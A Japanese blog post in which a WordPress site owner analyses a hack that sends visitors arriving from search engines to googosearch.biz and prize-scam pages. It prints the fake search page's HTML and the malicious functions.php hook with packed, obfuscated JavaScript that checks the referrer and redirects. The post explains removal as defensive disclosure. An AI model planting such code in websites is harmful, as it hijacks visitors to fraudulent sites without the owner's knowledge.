ワードプレスサイトが検索エンジンから来ると自動的に転送されてしまう症状

本来このような不徳の成す事は世間一般的に公表しないのであるが、自分以外にも必ず同じ症状を発症している人がいると思うのでここに記させて貰います。

発症と書きましたが、アンチウイルスソフトやマルウェア検出ソフトでは、当然の如く引っかかりませんでした。
多分理由としてはウイルス等と認識されていないからでしょう。

ことの発端は、googleから自分のサイトを検索し、クリックしたら、googesearch.bizというドメインのサイトへ転送されてしまう症状が起こってしまったのです。

最初はウイルスにでもPCが侵されたのか？
という事を考えた。

しかし、直にURLを打ち込んでサイトへ行くと問題が起こらない。

う～む。
賢いね。

で、とりあえず、どのような症状かわからないので、ネットからPCを切断し、ウイルスチェックをかけ、終わるのに一晩待つ。
しかし、何も引っかからない。

今度は、malwarebytesにてシステム全体をスキャンしても問題が無い。

さて、どうするか？

ここで自分だけで悩んでもしょうがないのでわざと地雷と踏んで見ることにした。

そして、その転送されるサイトがうまく機能した場合、さらに別のアドレスへ転送される仕組みに成っている。

まず、仕組みとしては

1. google等の検索エンジンで検索し、リダイレクト処置が施されているwordpressサイトをクリックする
2. サイトがロード終了後、もしくは、ロードの途中、勝手にhttp://googosearch.bizから始まるサイトへ転送される
3. さらに、http://googosearch.bizのサイトがロードに成功すると、自動的に違う懸賞サイトみたいなのに転送されてしまう。
4. http://googosearch.bizのサイトがロードに成功しない場合、一昔前のgoogleの検索画面に似た様な画面にて終了。

という仕組みになっています。

「googosearch.biz」というドメインは「91.223.89.112」というIPアドレスのサイトへかってに転送される。

このIPアドレスは「googosearch.biz」というドメインのものであり、google等で検索した用語をリダイレクトするように仕組まれている。
今回はRagnite Blueのサイトが一番よく検索される用語である「802.3at」を使ってgoogleにて検索してみた。

[xml]http://googosearch.biz/search.php?ty=1&terms=802.3at[/xml]

その後、そのサイトはちゃんとリダイレクトに成功すると、下記の様なURLを持つサイト等に転送される仕組みに成っている。

でも、最初はポップアップ。

http://topusaprizes.com/q/contest–/?sub1=q3&sub2=68226&sub3=1105135348

セキュリティーソフトウェアを偽装するソフトと同じ様に、これはgoogleのサイトを偽装しているのが見た目で分かる。
しかし、ちょっとした目では、googleのサイトを模倣しそこねたか、googleのサイトがちゃんとローディングせずに終わった感がある。

さて、ここでmalwarebytesというソフトを実行した状態で地雷を踏んでみると、malwarebytesではちゃんと「googosearch.biz」へ転送されるのを防いでくれた。


その時のログ。

<code>
09:47:38	Administrator	IP-BLOCK	91.223.89.112 (Type: outgoing)
09:47:41	Administrator	IP-BLOCK	91.223.89.112 (Type: outgoing)
09:47:47	Administrator	IP-BLOCK	91.223.89.112 (Type: outgoing)
</code>

ブロックされたのでChromeはロード出来ず。

他にも、リダイレクト先が以下の場合も有る事を他では確認されている。

• ソース：
  
• 転送先：
  1. http://hosting.multifind24.com/56895/0/11111010/20/hosting.html
     • このRagnite Blueのサイトが飛ばされたのがこのアドレス。
• http://hosting.multifind24.com/56895/0/11111010/20/net.html
  • ワードプレスサイトのフォーラムに↑のURLが記載されていました。
    

下記は転送された先の「googosearch.biz」のhtmlコードの部分である。悪用厳禁だよ！

<code>
&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;content-type&quot; content=&quot;text/html; charset=UTF-8&quot;&gt;
&lt;title&gt;802 - googosearch.biz Search&lt;/title&gt;
&lt;style&gt;div,td,.n a,.n a:visited{color:#000}.ts td,.tc{padding:0}.ts,.tb{border-collapse:collapse}.f{color:#666}.flc,a.fl{color:#77c}a,.w,.q:visited,.q:active,.q,.b a,.b a:visited,.mblink:visited{color:#00c}a:visited{color:#551a8b}a:active{color:red}.t{background:#d5dff3;color:#000;padding:5px 1px 4px}.bb{border-bottom:1px solid #36c}.bt{border-top:1px solid #36c}.j{width:34em}.h{color:#36c}.i{color:#a90a08}.a{color:green}.z{display:none}div.n{margin-top:1ex}.n a,.n .i{font-size:10pt}.n .i,.b a{font-weight:bold}.b a{font-size:12pt}#np,#nn,.nr,#logo span,.ch{cursor:pointer;cursor:hand}.ta{padding:3px 3px 3px 5px}#tpa2,#tpa3{padding-top:9px}#mybar{float:left;font-weight:bold;height:22px;padding-left:2px}#gbh{border-top:1px solid #c9d7f1;font-size:0;height:0;position:absolute;right:0;top:24px;width:200%}#gbi{background:#fff;border:1px solid;border-color:#c9d7f1 #36c #36c #a2bae7;font-size:13px;top:24px;z-index:1000}#guser{padding-bottom:7px !important}#mybar,#guser{font-size:13px;padding-top:1px !important}@media all{.gb1,.gb3{height:22px;margin-right:.73em;vertical-align:top}}#gbi,.gb2{display:none;position:absolute;width:8em}.gb2{z-index:1001}#mybar a,#mybar a:active,#mybar a:visited{color:#00c;font-weight:normal}.gb2 a,.gb3 a{text-decoration:none}.gb2 a{display:block;padding:.2em .5em}#mybar .gb2 a:hover{background:#36c;color:#fff}.sl,.r{display:inline;font-weight:normal;margin:0}.sl{font-size:84%}.r{font-size:1em}.e{margin:.75em 0}.sm{display:block;margin:0;margin-left:40px}.slk td{padding-top:5px;padding-left:40px;vertical-align:top;font-size:84%}.slk div{text-indent:-10px;padding-left:10px}.n div,#logo span{background:url(images/nav.png) no-repeat;height:26px;overflow:hidden}.n .nr{background-position:-60px 0;width:16px}#np{width:44px}#nf{background-position:-26px 0;width:18px}#nc{background-position:-44px 0;width:16px}#nn{margin-right:4px;width:66px}#nl{width:46px}#nn,#nl{background-position:-106px 0}#logo{display:block;height:52px;margin:13px 0 7px;overflow:hidden;position:relative;width:150px}#logo span{background-position:0 -26px;height:100%;left:0;position:absolute;top:0;width:100%}body{font-family:arial,sans-serif}.g{margin:1em 0}#sd{font-size:84%;font-weight:bold}#ap{font-size:64%}&lt;/style&gt;

&lt;script&gt;window.mybar={};(function(){;var g=window.mybar,a,f,h;function m(b,e,d){b.display=b.display==&quot;block&quot;?&quot;none&quot;:&quot;block&quot;;b.left=e+&quot;px&quot;;b.top=d+&quot;px&quot;}g.tg=function(b){var e=0,d,c,i,j=0,k=window.navExtra;!f&amp;&amp;(f=document.getElementById(&quot;mybar&quot;));!h&amp;&amp;(h=f.getElementsByTagName(&quot;span&quot;));(b||window.event).cancelBubble=true;if(!a){a=document.createElement(Array.every||window.createPopup?&quot;iframe&quot;:&quot;div&quot;);a.frameBorder=&quot;0&quot;;a.id=&quot;gbi&quot;;a.scrolling=&quot;no&quot;;a.src=&quot;#&quot;;document.body.appendChild(a);if(k)for(var n in k){var l=document.createElement(&quot;span&quot;);l.appendChild(k[n]);l.className=&quot;gb2&quot;;f.appendChild(l)}document.onclick=g.close}for(;h[j];j++){c=h[j];i=c.className;if(i==&quot;gb3&quot;){d=c.offsetLeft;while(c=c.offsetParent)d+=c.offsetLeft;m(a.style,d,24)}else if(i==&quot;gb2&quot;){m(c.style,d+1,25+e);e+=20}}a.style.height=e+&quot;px&quot;};g.close=function(b){a&amp;&amp;a.style.display==&quot;block&quot;&amp;&amp;g.tg(b)};})();&lt;/script&gt;

&lt;/head&gt;
&lt;body topmargin=&quot;3&quot; bgcolor=&quot;#ffffff&quot; marginheight=&quot;3&quot;&gt;
&lt;div id=&quot;mybar&quot;&gt;
&lt;nobr&gt;
&lt;span class=&quot;gb1&quot;&gt;&lt;a href=&quot;/&quot;&gt;Web&lt;/a&gt;&lt;/span&gt;
&lt;span class=&quot;gb1&quot;&gt;&lt;a href=&quot;search.php?terms=cash&quot;&gt;Cash&lt;/a&gt;&lt;/span&gt;
&lt;span class=&quot;gb1&quot;&gt;&lt;a href=&quot;search.php?terms=insurance&quot;&gt;Insurance&lt;/a&gt;&lt;/span&gt;
&lt;span class=&quot;gb1&quot;&gt;&lt;a href=&quot;search.php?terms=gambling&quot;&gt;Gambling&lt;/a&gt;&lt;/span&gt;
&lt;span class=&quot;gb1&quot;&gt;&lt;a href=&quot;search.php?terms=download&quot;&gt;Download&lt;/a&gt;&lt;/span&gt;
&lt;span class=&quot;gb1&quot;&gt;&lt;a href=&quot;search.php?terms=domains&quot;&gt;Domains&lt;/a&gt;&lt;/span&gt;
&lt;/nobr&gt;
&lt;/div&gt;
&lt;div id=&quot;gbh&quot;&gt;&lt;/div&gt;
&lt;div id=&quot;guser&quot; style=&quot;padding: 0pt 0pt 4px; font-size: 84%;&quot; width=&quot;100%&quot; align=&quot;right&quot;&gt;&lt;nobr&gt;&lt;a href=&quot;search.php?terms=weather&quot;&gt;Weather&lt;/a&gt;&lt;/nobr&gt;&lt;/div&gt;
&lt;table class=&quot;tb&quot; style=&quot;clear: left;&quot; width=&quot;100%&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;form method=&quot;get&quot; action=&quot;/search.php&quot;&gt;
&lt;td style=&quot;padding: 0pt 0pt 7px 0px;&quot; valign=&quot;top&quot; width=&quot;100%&quot;&gt;

&lt;table class=&quot;tb&quot; style=&quot;margin-top: 25px;&quot; border=0&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td class=&quot;tc&quot; nowrap=&quot;nowrap&quot;&gt;
&lt;input name=&quot;terms&quot; size=&quot;41&quot; maxlength=&quot;2048&quot; value=&quot;802&quot; title=&quot;Search&quot; type=&quot;text&quot;&gt;&lt;input value=&quot;Search&quot; type=&quot;submit&quot;&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/td&gt;
&lt;/form&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;table class=&quot;t bt&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; width=&quot;100%&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td nowrap=&quot;nowrap&quot;&gt;&lt;span id=&quot;sd&quot;&gt;&amp;nbsp;Web&amp;nbsp;&lt;/span&gt;&lt;/td&gt;
&lt;td align=&quot;right&quot; nowrap=&quot;nowrap&quot;&gt;&lt;font size=&quot;-1&quot;&gt;Results for &lt;b&gt;802&lt;/b&gt;.  (&lt;b&gt;0&lt;/b&gt; seconds)&amp;nbsp;&lt;/font&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div id=&quot;res&quot;&gt;
&lt;div&gt;



&lt;/div&gt;

&lt;br clear=&quot;all&quot;&gt;
&lt;/div&gt;
&lt;center&gt;

&lt;br clear=&quot;all&quot;&gt;

&lt;table class=&quot;ft t bb bt&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; width=&quot;100%&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td align=&quot;center&quot;&gt;&amp;nbsp;&lt;br&gt;

&lt;table align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form method=&quot;get&quot; action=&quot;/search.php&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td nowrap=&quot;nowrap&quot;&gt;

&lt;font size=&quot;-1&quot;&gt;
&lt;input name=&quot;terms&quot; size=&quot;31&quot; maxlength=&quot;2048&quot; value=&quot;802&quot; title=&quot;Search&quot; type=&quot;text&quot;&gt;
&lt;input value=&quot;Search&quot; type=&quot;submit&quot;&gt;
&lt;/font&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/form&gt;
&lt;/table&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/center&gt;
&lt;center&gt;
&lt;p&gt;
&lt;/p&gt;
&lt;hr class=&quot;z&quot;&gt;
&lt;div style=&quot;padding: 2px;&quot; class=&quot;&quot;&gt;&lt;font size=&quot;-1&quot;&gt;&amp;#169;2008-2011 googosearch.biz&lt;/font&gt;
&lt;/div&gt;
&lt;/center&gt;

&lt;/body&gt;
&lt;/html&gt;
</code>

下記はwordpressのテーマの中にあるfunctions.phpに含まれている悪質なコードの部分である。

<code>
&lt;?php
add_action('get_footer', 'add_sscounter');
	function add_sscounter(){
		echo '&lt;!--scounter--&gt;';
		if(function_exists('is_user_logged_in')){
			if(time()%2 == 0 &amp;&amp; !is_user_logged_in()){
				echo &quot;&lt;script language=\&quot;JavaScript\&quot;&gt;eval(function(p,a,c,k,e,r){e=function(c){return(c&lt;a?'':e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c][/c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c][/c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c][/c][/c]);return p}('o r=a.e,t=\&quot;\&quot;,q;5(r.4(\&quot;m.\&quot;)!=-1)t=\&quot;q\&quot;;5(r.4(\&quot;b.\&quot;)!=-1)t=\&quot;q\&quot;;5(r.4(\&quot;c.\&quot;)!=-1)t=\&quot;p\&quot;;5(r.4(\&quot;f.\&quot;)!=-1)t=\&quot;q\&quot;;5(r.4(\&quot;g.\&quot;)!=-1)t=\&quot;h\&quot;;5(r.4(\&quot;i.\&quot;)!=-1)t=\&quot;q\&quot;;5(t.6&amp;&amp;((q=r.4(\&quot;?\&quot;+t+\&quot;=\&quot;))!=-1||(q=r.4(\&quot;&amp;\&quot;+t+\&quot;=\&quot;))!=-1))j.k=\&quot;l://9\&quot;+\&quot;1.\&quot;+\&quot;n\&quot;+\&quot;3\&quot;+\&quot;.\&quot;+\&quot;8\&quot;+\&quot;9.1\&quot;+\&quot;s/\&quot;+\&quot;u.p\&quot;+\&quot;v?w\&quot;+\&quot;d=7&amp;t\&quot;+\&quot;x\&quot;+\&quot;y=\&quot;+r.z(q+2+t.6).A(\&quot;&amp;\&quot;)[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{}))&lt;/script&gt;&quot;;
			}
		}
	}
?&gt;</code>

問題を修正するためにはテーマファイルの中のfunctions.phpの中に記述されている上記の部分を削除すれば問題は万事解決する。

追記：
ワードプレスでは最近パッカーというタイプのjavascript圧縮が流行っている。
これはその仕組を悪用しているのだが、自分のサイトの中に、その圧縮されたjavascriptが有り、内容が理解出来ないのであれば下記のサイトでデコードすると内容が読めるようになる。
www.strictly-software.com/unpacker